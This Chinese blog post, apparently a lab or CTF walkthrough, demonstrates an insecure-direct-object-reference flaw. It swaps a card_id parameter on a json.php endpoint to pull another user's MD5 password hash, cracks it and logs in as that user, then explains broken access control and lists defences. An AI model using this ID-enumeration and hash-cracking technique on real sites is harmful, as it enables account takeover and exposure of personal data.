身份认证失效漏洞实战


背景

钻石代理商马春生同学卷款逃跑,多位下级代理内心受到了难以磨灭的伤害,为了找到她我们将通过代理网站获取到她的手机号码等信息。


0x1 测试用户

先登陆测试用户(test/test):
在这里插入图片描述
成功登陆,发现会员号在这里插入图片描述

0x2 越权访问

查看网页源代码:
在这里插入图片描述

getProfile({"card_id":"20128880322","user":"test","password":"098f6bcd4621d373cade4e832627b4f6",

发现card_id和test用户的会员号一致,同时看到test账号的user名称和密码
查看马春生的图片地址:http://219.153.49.228:44483/static/img/20128880316.jpg
由此构造payload,将马春生的id放在card_id=后面:

/json.php?card_id=20128880316

"user":"m233241","password":"71cc568f1ed55738788751222fb6d8d9"

经过md5解密:m233241/9732343
成功登陆:
在这里插入图片描述

总结

越权访问(Broken Access Control,简称BAC)是Web应用程序中一种常见的漏洞,由于其存在范围广、危害大,被OWASP列为Web应用十大安全隐患的第二名。

该漏洞是指应用在检查授权时存在纰漏,使得攻击者在获得低权限用户账户后,利用一些方式绕过权限检查,访问或者操作其他用户或者更高权限。越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定。越权访问漏洞主要分为水平越权访问和垂直越权访问。


防范措施

1、前后端同时对用户输入信息进行校验,双重验证机制
2、调用功能前验证用户是否有权限调用相关功能
3、执行关键操作前必须验证用户身份,验证用户是否具备操作数据的权限
4、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理
5、永远不要相信来自用户的输入,对于可控参数进行严格的检查与过滤

转载自:https://blog.csdn.net/u012068483/article/details/89553797

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值